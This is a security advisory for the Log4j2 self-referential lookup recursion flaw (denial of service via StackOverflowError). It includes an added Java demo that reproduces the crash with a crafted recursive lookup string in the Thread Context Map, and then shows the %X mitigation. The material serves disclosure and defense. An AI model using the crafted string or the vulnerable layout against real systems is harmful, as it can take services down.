GHSA-p6xc-xr62-6r2g · High · CVSS 8.6

Apache Log4j2 vulnerable to Improper Input Validation and Uncontrolled Recursion

Published
December 18, 2021
Last Modified
June 9, 2026

🔗 CVE IDs covered (1)

📋 Description

Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect against uncontrolled recursion from self-referential lookups. When a logging configuration uses a Context Lookup such as $${ctx:loginId} in a PatternLayout, an attacker who controls Thread Context Map (MDC) data can supply a crafted string that is re-interpreted recursively while the event is formatted, causing a denial of service (a StackOverflowError). This issue was fixed in Log4j 2.17.0, 2.12.3 and 2.3.1.
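The following Java program is an added example, not code from this advisory or from the Log4j project. It builds the vulnerable configuration described above (a PatternLayout containing a Context Lookup) and places a recursive lookup string in the Thread Context Map, then shows the hardened layout that reads the same MDC key with the %X converter instead of a lookup, which is the mitigation the upstream project documents. It assumes org.apache.logging.log4j:log4j-core (and the matching log4j-api) is on the classpath; the class name, the key name loginId, and the --hardened flag are chosen for illustration. The crafted value is the recursive lookup string from the upstream issue LOG4J2-3230.

```java
// Added example: reproduces the recursion condition against log4j-core 2.16.0
// and shows the hardened pattern. Not from the advisory or the Log4j project.
import org.apache.logging.log4j.Level;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.ThreadContext;
import org.apache.logging.log4j.core.LoggerContext;
import org.apache.logging.log4j.core.config.Configurator;
import org.apache.logging.log4j.core.config.builder.api.ConfigurationBuilder;
import org.apache.logging.log4j.core.config.builder.api.ConfigurationBuilderFactory;
import org.apache.logging.log4j.core.config.builder.impl.BuiltConfiguration;

public class Log4jRecursionDemo {

    // Vulnerable: a Context Lookup in the layout. The "$$" escape defers the
    // lookup from configuration time to log-event time, so the MDC value is
    // fetched and run through the lookup substitutor for every event.
    static final String VULNERABLE_PATTERN = "%d %p [%t] user=$${ctx:loginId} %m%n";

    // Hardened: the %X pattern converter copies the MDC value verbatim and
    // never hands it to the substitutor, so nested "${...}" is printed literally.
    static final String HARDENED_PATTERN = "%d %p [%t] user=%X{loginId} %m%n";

    // Recursive lookup string reported upstream (LOG4J2-3230): each substitution
    // pass yields a string that again contains a lookup to expand.
    static final String RECURSIVE_VALUE = "${${::-${::-$${::-j}}}}";

    // Programmatic equivalent of a log4j2.xml with one console appender.
    static LoggerContext configure(String pattern) {
        ConfigurationBuilder<BuiltConfiguration> b =
                ConfigurationBuilderFactory.newConfigurationBuilder();
        b.add(b.newAppender("Console", "CONSOLE")
                .add(b.newLayout("PatternLayout").addAttribute("pattern", pattern)));
        b.add(b.newRootLogger(Level.INFO).add(b.newAppenderRef("Console")));
        return Configurator.initialize(b.build());
    }

    public static void main(String[] args) {
        boolean hardened = args.length > 0 && "--hardened".equals(args[0]);
        LoggerContext ctx = configure(hardened ? HARDENED_PATTERN : VULNERABLE_PATTERN);
        Logger log = LogManager.getLogger(Log4jRecursionDemo.class);

        // Attacker-controlled data reaching the Thread Context Map, e.g. a
        // username copied from an HTTP header into the MDC by a servlet filter.
        ThreadContext.put("loginId", RECURSIVE_VALUE);
        try {
            // On 2.16.0 with VULNERABLE_PATTERN this call ends in a
            // StackOverflowError thrown into the logging thread.
            // On 2.17.0+, 2.12.3, 2.3.1, or with HARDENED_PATTERN, the value
            // is written to the log line as-is.
            log.info("login attempt");
        } finally {
            ThreadContext.remove("loginId");
            ctx.close();
        }
    }
}
```

Run it once against log4j-core 2.16.0 with no arguments to observe the failure, then with --hardened (or against a fixed release) to see the same input logged harmlessly. The practical takeaway for configurations that cannot be upgraded immediately: replace Context Lookups (${ctx:...}) in layouts with %X, %mdc or %MDC, which read the Thread Context Map without interpreting its contents.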

Affected packages

Only the org.apache.logging.log4j:log4j-core package is directly affected by this vulnerability. If org.apache.logging.log4j:log4j-api is also in use, keep it at the same version as log4j-core to ensure compatibility.

🎯 Affected products (7)

  • maven/org.apache.logging.log4j:log4j-core:>= 2.4.0, < 2.12.3
  • maven/org.apache.logging.log4j:log4j-core:>= 2.13.0, < 2.17.0
  • maven/org.apache.logging.log4j:log4j-core:< 2.3.1
  • maven/org.ops4j.pax.logging:pax-logging-log4j2:>= 1.8.0, < 1.9.2
  • maven/org.ops4j.pax.logging:pax-logging-log4j2:>= 1.10.0, < 1.10.9
  • maven/org.ops4j.pax.logging:pax-logging-log4j2:>= 1.11.0, < 1.11.12
  • maven/org.ops4j.pax.logging:pax-logging-log4j2:>= 2.0.0, < 2.0.13

🔗 References (19)